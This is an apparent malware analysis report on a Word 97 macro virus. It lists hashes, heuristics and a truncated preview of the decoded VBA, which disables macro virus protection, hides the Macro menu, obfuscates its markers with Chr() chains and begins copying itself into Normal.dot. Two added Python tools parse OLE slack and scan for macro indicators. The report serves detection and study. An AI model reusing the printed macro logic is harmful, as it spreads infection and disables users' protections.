Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 053447e7a9259a5b…

MALICIOUS

Office (OLE)

Size: 73.0 KB
Created: 2001-12-07 10:03:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 11010eec7c41778b6f955f188044dc58
SHA-1: 664936921b14249cce0aa8a8a1a5c504464f9a33
SHA-256: 053447e7a9259a5b9c40d570d39c90f98b9585807554d74bf8e2436d5f0dbe7b
Risk score: 240

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Word 97 macro virus. Its Document_Open macro switches off Word's macro virus protection twice over (it writes EnableMacroVirusProtection=0 under HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options and sets Options.VirusProtection = False), deletes the Macro entry from the Tools menu so the user can neither see the warning nor reach the macro editor, shows a greeting box on a few hard-coded dates, and then calls Document_Close. Document_Close is the replication routine: it checks the "fs080298" marker (assembled from Chr() calls, so the literal never appears in the source), unloads add-ins, disables Ctrl+Break (EnableCancelKey = wdCancelDisabled), overwrites the user name, initials and address, and reads and compares the VBA code modules of the active document and of NormalTemplate (the Sisipin routine), which is the classic Normal.dot infection mechanism of the era; the write step and the LoggingIn and EmailMePlease routines fall beyond the truncated preview, so the logging and mail behaviour their names suggest is not confirmed by what is shown. The EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE, OLE_SLACK_ANOMALY and OLE_PARSE_EMPTY_STREAMS findings all rest on one carved region (offset 0xB2E7 to end of file) that carries a CFB signature but no readable directory; that is at least as consistent with a carver hit on signature bytes inside the parent document as with a hidden payload, and should not be read as evidence of packing or obfuscation without further inspection.

Heuristics (6)

  • ClamAV: Doc.Trojan.Marker-35 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-35
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE signature was found inside the sample and the region carved from it matched Office exploit or payload heuristics. The heuristic is meant for wrapped exploit documents whose top-level type routes them to a PE, archive or generic scanner instead of Office. Here the parent is itself an OLE Word document, and the carve runs from offset 0xB2E7 to end of file (0xB2E7 + 28,953 = 74,752 bytes, i.e. 73.0 KB), so it is more likely a signature match inside the parent than a separately wrapped document. Confirm against the parent's own directory before escalating.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    The carved OLE region is 28,953 bytes but its declared streams total 0 bytes, so all 28,953 bytes (100%) fall in unallocated sector slack. Slack is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached through a parser pointer-corruption bug in the document structure); with no directory at all, however, a 100% figure is equally what a misaligned or false carve produces.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    The macro runs automatically when the document is opened (auto-execution trigger); here it is the routine that disables macro virus protection.
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The carved region begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous: it is seen with truncated or corrupt files and, more importantly, with content deliberately shifted off sector boundaries to defeat parsers while the host application still recovers the object. This finding applies to the carved child region, not to the parent document, whose VBA storage was parsed normally (see the macros.bas artifact).
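The two structural findings above (OLE_SLACK_ANOMALY and OLE_PARSE_EMPTY_STREAMS) come from the same accounting: read the CFB header, load the FAT from the header DIFAT, walk the directory chain, sum the sizes the stream entries declare, and compare the sectors the FAT allocates against the file size. The Python below is an added example written for this page, not the analysis tool's own code. It builds two fixtures in memory (a one-stream Word-style container and a header whose directory pointer lies past end of file with no FAT listed), and the 25% slack threshold and the finding names returned by triage() are assumptions for illustration that merely echo the report's labels.

```python
import struct

# CFB/OLE2 constants (MS-CFB); v3 containers use 512-byte sectors and a 512-byte header.
CFB_SIG = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
ENDOFCHAIN, FREESECT, FATSECT, NOSTREAM = 0xFFFFFFFE, 0xFFFFFFFF, 0xFFFFFFFD, 0xFFFFFFFF
HEADER_SIZE = 512
SLACK_RATIO = 0.25  # assumed threshold for flagging unallocated bytes, not the tool's value


def parse_cfb(data):
    """Account for the bytes of a CFB container: stream entries found in the directory,
    the total size they declare, and bytes beyond the header that no FAT entry claims."""
    if len(data) < HEADER_SIZE or data[:8] != CFB_SIG:
        raise ValueError("not a CFB/OLE2 file")
    sector_size = 1 << struct.unpack_from("<H", data, 0x1E)[0]
    first_dir = struct.unpack_from("<I", data, 0x30)[0]
    difat = struct.unpack_from("<109I", data, 0x4C)  # FAT sector list embedded in the header

    def sector(n):
        # Sector 0 starts right after the header; special values and EOF yield None.
        off = (n + 1) * sector_size
        if n >= 0xFFFFFFFA or off + sector_size > len(data):
            return None
        return data[off:off + sector_size]

    fat = []
    for n in difat:
        chunk = None if n == FREESECT else sector(n)
        if chunk is None:
            break
        fat.extend(struct.unpack("<%dI" % (sector_size // 4), chunk))

    streams, seen, n = [], set(), first_dir
    while n not in seen:  # walk the directory chain; stop at EOF, loops or a missing FAT
        seen.add(n)
        chunk = sector(n)
        if chunk is None:
            break
        for i in range(0, sector_size, 128):
            entry = chunk[i:i + 128]
            name_len, obj_type = struct.unpack_from("<HB", entry, 0x40)
            if obj_type == 2 and 2 <= name_len <= 64:  # type 2 = stream
                name = entry[:name_len - 2].decode("utf-16-le", "replace")
                streams.append((name, struct.unpack_from("<I", entry, 0x78)[0]))
        n = fat[n] if n < len(fat) else ENDOFCHAIN

    used = sum(1 for x in fat if x != FREESECT)
    return {
        "streams": streams,
        "declared_stream_bytes": sum(size for _, size in streams),
        "unallocated_bytes": max(0, len(data) - HEADER_SIZE - used * sector_size),
    }


def triage(data):
    """Map the accounting onto the report's two structural finding codes (names assumed)."""
    result = parse_cfb(data)
    findings = []
    if not result["streams"]:
        findings.append("OLE_PARSE_EMPTY_STREAMS")
    body = len(data) - HEADER_SIZE
    if body > 0 and result["unallocated_bytes"] / body >= SLACK_RATIO:
        findings.append("OLE_SLACK_ANOMALY")
    return findings


def _header(first_dir, fat_sector):
    hdr = bytearray(HEADER_SIZE)
    hdr[:8] = CFB_SIG
    struct.pack_into("<HHHHH", hdr, 0x18, 0x3E, 3, 0xFFFE, 9, 6)  # v3, 512-byte sectors
    n_fat = 0 if fat_sector == FREESECT else 1
    struct.pack_into("<9I", hdr, 0x28, 0, n_fat, first_dir, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    struct.pack_into("<109I", hdr, 0x4C, fat_sector, *([FREESECT] * 108))
    return hdr


def build_minimal_cfb(stream_name, payload):
    """Constructed fixture: FAT in sector 0, directory in sector 1, one regular stream
    from sector 2 on. payload must be >= 4096 bytes so it is not a mini-stream."""
    ss = 512
    n_data = -(-len(payload) // ss)
    fat = [FATSECT, ENDOFCHAIN] + [3 + i for i in range(n_data)]
    fat[-1] = ENDOFCHAIN
    fat += [FREESECT] * (ss // 4 - len(fat))

    def entry(name, obj_type, child, start, size):
        e = bytearray(128)
        raw = name.encode("utf-16-le") + b"\x00\x00"
        e[:len(raw)] = raw
        struct.pack_into("<HBBIII", e, 0x40, len(raw), obj_type, 1, NOSTREAM, NOSTREAM, child)
        struct.pack_into("<IQ", e, 0x74, start, size)
        return bytes(e)

    directory = entry("Root Entry", 5, 1, ENDOFCHAIN, 0) + entry(stream_name, 2, NOSTREAM, 2, len(payload))
    directory += bytes(ss - len(directory))
    return bytes(_header(1, 0)) + struct.pack("<128I", *fat) + directory + payload + bytes(n_data * ss - len(payload))


def build_orphaned_cfb(tail):
    """Constructed fixture: a valid header whose directory pointer is past EOF and whose
    DIFAT lists no FAT sector, followed by bytes that no structure accounts for."""
    return bytes(_header(500, FREESECT)) + tail


if __name__ == "__main__":
    tail = bytes(b ^ 0x5A for b in b"constructed filler, not real shellcode " * 64)
    print("well-formed:", triage(build_minimal_cfb("WordDocument", b"\x00" * 4096)))
    print("orphaned   :", triage(build_orphaned_cfb(tail)))
```

The parser deliberately trusts nothing past the header: it stops the directory walk at the first sector that falls outside the file or revisits a sector, so a region whose header was carved from the middle of another document degrades to "no streams, everything unallocated" rather than raising. That is exactly the signature the two findings above report, which is why a real embedded object and a bad carve look the same at this level and need the parent's directory to tell apart.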

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43339 bytes
SHA-256: 522c9d9899d655cbfea6a216ff721fa024203e9ac642998f2f527060ad3974eb
Preview: first 1,000 lines of the extracted script (truncated in this copy)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
 'Son, Be a Good Boy !
Const Marker = "<- this is a marker! by fs080298"
Private Sub Document_Open()
    On Error Resume Next
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = 1 Then
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = 0
        CommandBars("Tools").Controls("Macro").Delete
    Else
        CommandBars("Tools").Controls("Macro").Delete
    End If
    Options.VirusProtection = False
    If Month(Now) = 1 And Day(Now) < 10 Then Message$ = "HAPPY NEW YEAR " & Year(Now) & " ! From : «(¤¿¤)» Me !"
        If Day(Now) = ((64 / 8) - 2 + 10 - (6 + 2)) And Month(Now) = ((30 / 6) + (4 / 2) + 4 - 5) Then Message$ = "Today Is My Birthday ! Thank's For Your Greeting..."
            If Day(Now) = ((25 / 5) - 2 + 10 + 14) And Month(Now) = (2 ^ 5) - 30 + 5 Then Message$ = "Happy Birthday Honey, I Love U So Much..."
                If Day(Now) = (3 ^ 6) - 700 + (2 ^ 3) - 22 And Month(Now) = (5 ^ 3) - 120 + 7 Then Message$ = "Happy Birthday, Son ! Be a Good Boy..."
                    If Message$ <> "" Then MsgBox Message$, vbInformation, "From : <(¤¿¤)>"
    Message$ = ""
    Document_Close
End Sub
Private Sub Document_Close()
    Dim nmod As Object
    Dim isd As String
    Dim DS, NTS, DI, NTI As Boolean
    Dim EmailMe, Users, LogData, LogFile As String
    On Error Resume Next
    If Right(Marker, 8) <> Chr(102) + Chr(115) + Chr(48) + Chr(56) + Chr(48) + Chr(50) + Chr(57) + Chr(56) Then GoTo Finish
    AddIns.Unload True
    Application.UserName = "fs080298"
    Application.UserInitials = "FS2000"
    Application.UserAddress = "fs080298@yeayea.com"
    Application.EnableCancelKey = wdCancelDisabled
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "" And Mid(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(121, 1), 33, 8) <> Chr$(70) + Chr$(83) + Chr$(48) + Chr$(56) + Chr$(48) + Chr$(50) + Chr$(57) + Chr$(56) Then GoTo Finish
    GoSub Sisipin
    If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", _
    "LogData in") = False) Then GoSub LoggingIn
    GoSub EmailMePlease
    GoTo Finish
    
Sisipin:
    Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
    Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "" And NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> Chr(32) + Chr$(39) + Chr$(83) + Chr$(111) + Chr$(110) + Chr$(44) + Chr$(32) + Chr$(66) + Chr$(101) + Chr$(32) + Chr$(97) + Chr$(32) + Chr$(71) + Chr$(111) + Chr$(111) + Chr$(100) + Chr$(32) + Chr$(66) + Chr$(111) + Chr$(121) + Chr$(32) + Chr$(33) Then Return
    DI = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
    NTI = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "" And Mid(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(95, 1), 119, 20) <> Chr$(32) + Chr$(169) + Chr$(32) + Chr$(72) + Chr$(97) + Chr$(118) + Chr$(101) + Chr$(32) + Chr$(97) + Chr$(32) + Chr$(78) + Chr$(105) + Chr$(99) + Chr$(101) + Chr$(32) + Chr$(68) + Chr$(97) + Chr$(121) + Chr$(32) + Chr$(33) Then Return
    If (DI Xor NTI) And (ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate) Then
        If DI Then
            NTS = NormalTemplate.Saved
            EmailMe = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
        For i = 1 To Len(Application.UserAddress)
            If (Mid(Application.UserAddress, i, 1) <> Chr(13)) Then
                If (Mid(Application.UserAddress
... (truncated)
embedded_office_off0000b2e7.ole | embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0xB2E7 | 28953 bytes
SHA-256: 65abc523d111bee451736b35d9899ba6af8003754342e72eb2f54a1b9ec7fc7d
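The marker checks in the extracted macro never spell out "fs080298" or "FS080298": both are rebuilt at runtime from Chr() and Chr$() chains, so a plain string search over macros.bas misses them, and the same trick hides the " 'Son, Be a Good Boy !" and " © Have a Nice Day !" comparison strings. The Python below is an added example written for this page, not code from the analysis tool or from the sample. It folds Chr() chains back into literals (Word 97 Chr() is 8-bit, decoded here as Windows-1252), then matches a small indicator table against the cleaned source; the excerpt it runs on is trimmed from the preview above, and the indicator list, its labels and the replication rule (Normal template project plus CodeModule access) are the editor's own assumptions.

```python
import re

# Excerpt trimmed from the macro preview in this report (constructed test input).
MACRO_EXCERPT = r"""
Private Sub Document_Open()
    On Error Resume Next
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = 0
    CommandBars("Tools").Controls("Macro").Delete
    Options.VirusProtection = False
End Sub
Private Sub Document_Close()
    On Error Resume Next
    If Right(Marker, 8) <> Chr(102) + Chr(115) + Chr(48) + Chr(56) + Chr(48) + Chr(50) + Chr(57) + Chr(56) Then GoTo Finish
    AddIns.Unload True
    Application.EnableCancelKey = wdCancelDisabled
    If Mid(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(121, 1), 33, 8) <> Chr$(70) + Chr$(83) + Chr$(48) + Chr$(56) + Chr$(48) + Chr$(50) + Chr$(57) + Chr$(56) Then GoTo Finish
    EmailMe = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
End Sub
"""

CHR_CHAIN = re.compile(r"Chr\$?\(\s*\d+\s*\)(?:\s*\+\s*Chr\$?\(\s*\d+\s*\))*")
CHR_ARG = re.compile(r"Chr\$?\(\s*(\d+)\s*\)")

# Indicator table is the editor's own; the labels are what scan_macro() returns.
INDICATORS = [
    (r"\bOptions\.VirusProtection\s*=\s*False\b", "disables Word macro virus protection"),
    (r"\bEnableMacroVirusProtection\b", "rewrites EnableMacroVirusProtection in the registry"),
    (r'CommandBars\("Tools"\)\.Controls\("Macro"\)\.Delete', "removes the Tools > Macro menu entry"),
    (r"\bNormalTemplate\.VBProject\b", "touches the Normal template VBA project"),
    (r"\bCodeModule\.(?:Lines|CountOfLines|Find|AddFromString|InsertLines)\b",
     "reads or writes macro source through CodeModule"),
    (r"\bEnableCancelKey\s*=\s*wdCancelDisabled\b", "disables Ctrl+Break while the macro runs"),
    (r"\bAddIns\.Unload\b", "unloads all Word add-ins"),
]


def decode_chr_chains(src):
    """Fold Chr(n) + Chr(n) ... concatenations into string literals and return
    (rewritten source, list of recovered strings)."""
    found = []

    def fold(match):
        raw = bytes(int(n) & 0xFF for n in CHR_ARG.findall(match.group(0)))
        text = raw.decode("cp1252", "replace")
        found.append(text)
        return '"' + text.replace('"', '""') + '"'  # VBA escapes a quote by doubling it

    return CHR_CHAIN.sub(fold, src), found


def scan_macro(src):
    """Deobfuscate first, then match indicators on the cleaned source."""
    clear, strings = decode_chr_chains(src)
    hits = [label for pattern, label in INDICATORS if re.search(pattern, clear)]
    replicates = ("touches the Normal template VBA project" in hits
                  and "reads or writes macro source through CodeModule" in hits)
    return {"decoded_strings": strings, "indicators": hits, "replicates": replicates}


if __name__ == "__main__":
    report = scan_macro(MACRO_EXCERPT)
    print("decoded strings:", report["decoded_strings"])
    for hit in report["indicators"]:
        print(" -", hit)
    print("self-replicating:", report["replicates"])
```

Run on the excerpt, the decoder recovers "fs080298" and "FS080298" and every indicator in the table fires; the replication verdict rests on the two Normal-template indicators together, because reading CodeModule on the active document alone is also what benign code-generation add-ins do.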